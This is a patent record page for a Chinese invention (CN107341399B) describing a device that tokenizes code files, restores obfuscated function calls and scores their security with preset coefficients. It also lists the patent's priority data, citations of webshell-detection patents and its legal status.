- 8. A device for assessing the security of a code file, characterized by comprising: a parsing module, configured to parse a variable function and an assignment expression from a code file to be detected; a restoring module, configured to restore a direct call function and an original call function according to the variable function and the assignment expression; and an assessment module, configured to assess the security of the code file using a preset security coefficient corresponding to the direct call function and a preset security coefficient corresponding to the original call function.
- 9. The device according to claim 8, characterized in that the parsing module comprises: a conversion unit, configured to perform lexical analysis on the code file and convert the character sequence in the code file into a Token sequence; and a parsing unit, configured to parse the variable function and the assignment expression from the Token sequence.
- 10. The device according to claim 9, characterized in that the parsing unit comprises: a first search subunit, configured to traverse each Token in the Token sequence in a preset order and look for a first Token whose category is operator and whose value is a left parenthesis; a judgment subunit, configured to determine, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable; and a first parsing subunit, configured to, when the output of the judgment subunit is yes, look, starting from the first Token, for a second Token whose category is operator and whose value is a right parenthesis, and, when the set of parameters between the first Token and the second Token matches a preset regular expression, record the function currently found as the variable function and return to the first search subunit, until the variable function has been parsed.
- 11. The device according to claim 9, characterized in that the parsing unit comprises: a second search subunit, configured to traverse each Token in the Token sequence in a preset order and look for a third Token whose category is operator and whose value is an equals sign; an acquisition subunit, configured to obtain, when the third Token is found, the previously traversed Token adjacent to the third Token, and record the value of the obtained Token as the variable to be assigned in the assignment expression currently found; and a second parsing subunit, configured to look, starting from the third Token, for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record the one or more Tokens as the expression to be calculated in the assignment expression currently found, and return to the second search subunit, until the assignment expression has been parsed.
- 12. The device according to any one of claims 8 to 11, characterized in that the restoring module comprises: a first restoring unit, configured to look up, in preset transcoding rules, the direct call function that matches the variable function; a processing unit, configured to calculate the value corresponding to the variable of each assignment expression and establish a correspondence between the variable of each assignment expression and its value; and a second restoring unit, configured to use the preset transcoding rules and the correspondence to identify the original call function from the direct call function.
- 13. The device according to claim 8, characterized in that the assessment module comprises: a reading unit, configured to read, from a preset storage area, the security coefficient corresponding to the direct call function and the security coefficient corresponding to the original call function; and a computing unit, configured to sum the security coefficient corresponding to the direct call function and the security coefficient corresponding to the original call function to obtain a security assessment result.
- 14. A device for assessing the security of a code file, characterized by comprising: a parsing module, configured to parse a variable function from a code file to be detected; a restoring module, configured to restore a direct call function according to the variable function; and an assessment module, configured to assess the security of the code file using a preset security coefficient corresponding to the direct call function.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610282740.8A CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201610282740.8A CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Publications (2)
Publication Number | Publication Date |
---|---|
CN107341399A true CN107341399A (en) | 2017-11-10 |
CN107341399B CN107341399B (en) | 2020-09-04 |
Family
ID=60221962
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201610282740.8A Active CN107341399B (en) | 2016-04-29 | 2016-04-29 | Method and device for evaluating security of code file |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN107341399B (en) |
Cited By (11)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
CN108959071A (en) * | 2018-06-14 | 2018-12-07 | 湖南鼎源蓝剑信息科技有限公司 | A kind of detection method and system of the PHP deformation webshell based on RASP |
CN109408113A (en) * | 2018-09-03 | 2019-03-01 | 平安普惠企业管理有限公司 | A kind of code text processing method, system and terminal device |
CN109660499A (en) * | 2018-09-13 | 2019-04-19 | 阿里巴巴集团控股有限公司 | It attacks hold-up interception method and device, calculate equipment and storage medium |
CN110413284A (en) * | 2019-08-06 | 2019-11-05 | 腾讯科技(深圳)有限公司 | Morphology analysis methods, device, computer equipment and storage medium |
CN110795731A (en) * | 2019-10-09 | 2020-02-14 | 新华三信息安全技术有限公司 | Page detection method and device |
CN111368304A (en) * | 2020-03-31 | 2020-07-03 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN112800427A (en) * | 2021-04-08 | 2021-05-14 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN113032779A (en) * | 2021-02-04 | 2021-06-25 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN114422148A (en) * | 2022-03-25 | 2022-04-29 | 北京长亭未来科技有限公司 | Webshell framework depicting and detecting method, device and equipment |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101436128A (en) * | 2007-11-16 | 2009-05-20 | 北京邮电大学 | Software test case automatic generating method and system |
CN102955914A (en) * | 2011-08-19 | 2013-03-06 | 百度在线网络技术(北京)有限公司 | Method and device for detecting security flaws of source files |
CN105069355A (en) * | 2015-08-26 | 2015-11-18 | 厦门市美亚柏科信息股份有限公司 | Static detection method and apparatus for webshell deformation |
Non-Patent Citations (1)
Title |
---|
TRUONG DINH TU等: "《Evil-hunter:a novel web shell detection system based on scoring scheme》", 《JOURNAL OF SOUTHEAST UNIVERSITY (ENGLISH EDITION)》 * |
Cited By (19)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
CN108459962B (en) * | 2018-01-23 | 2021-09-03 | 平安普惠企业管理有限公司 | Code normalization detection method and device, terminal equipment and storage medium |
CN108959071A (en) * | 2018-06-14 | 2018-12-07 | 湖南鼎源蓝剑信息科技有限公司 | A kind of detection method and system of the PHP deformation webshell based on RASP |
CN109408113A (en) * | 2018-09-03 | 2019-03-01 | 平安普惠企业管理有限公司 | A kind of code text processing method, system and terminal device |
CN109660499A (en) * | 2018-09-13 | 2019-04-19 | 阿里巴巴集团控股有限公司 | It attacks hold-up interception method and device, calculate equipment and storage medium |
CN109660499B (en) * | 2018-09-13 | 2021-07-27 | 创新先进技术有限公司 | Attack interception method and device, computing equipment and storage medium |
CN110413284A (en) * | 2019-08-06 | 2019-11-05 | 腾讯科技(深圳)有限公司 | Morphology analysis methods, device, computer equipment and storage medium |
CN110413284B (en) * | 2019-08-06 | 2023-10-17 | 腾讯科技(深圳)有限公司 | Lexical analysis method, lexical analysis device, computer equipment and storage medium |
CN110795731A (en) * | 2019-10-09 | 2020-02-14 | 新华三信息安全技术有限公司 | Page detection method and device |
CN110795731B (en) * | 2019-10-09 | 2022-02-25 | 新华三信息安全技术有限公司 | Page detection method and device |
CN111368304A (en) * | 2020-03-31 | 2020-07-03 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN111368304B (en) * | 2020-03-31 | 2022-07-05 | 绿盟科技集团股份有限公司 | Malicious sample category detection method, device and equipment |
CN114006706A (en) * | 2020-07-13 | 2022-02-01 | 深信服科技股份有限公司 | Network security detection method, system, computer device and readable storage medium |
CN113032779A (en) * | 2021-02-04 | 2021-06-25 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN113032779B (en) * | 2021-02-04 | 2024-01-02 | 中国科学院软件研究所 | Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule |
CN112800427B (en) * | 2021-04-08 | 2021-09-28 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN112800427A (en) * | 2021-04-08 | 2021-05-14 | 北京邮电大学 | Webshell detection method and device, electronic equipment and storage medium |
CN114422148A (en) * | 2022-03-25 | 2022-04-29 | 北京长亭未来科技有限公司 | Webshell framework depicting and detecting method, device and equipment |
CN114422148B (en) * | 2022-03-25 | 2024-04-09 | 北京长亭未来科技有限公司 | Framework depiction and detection method, device and equipment of Webshell |
Also Published As
Publication number | Publication date |
---|---|
CN107341399B (en) | 2020-09-04 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||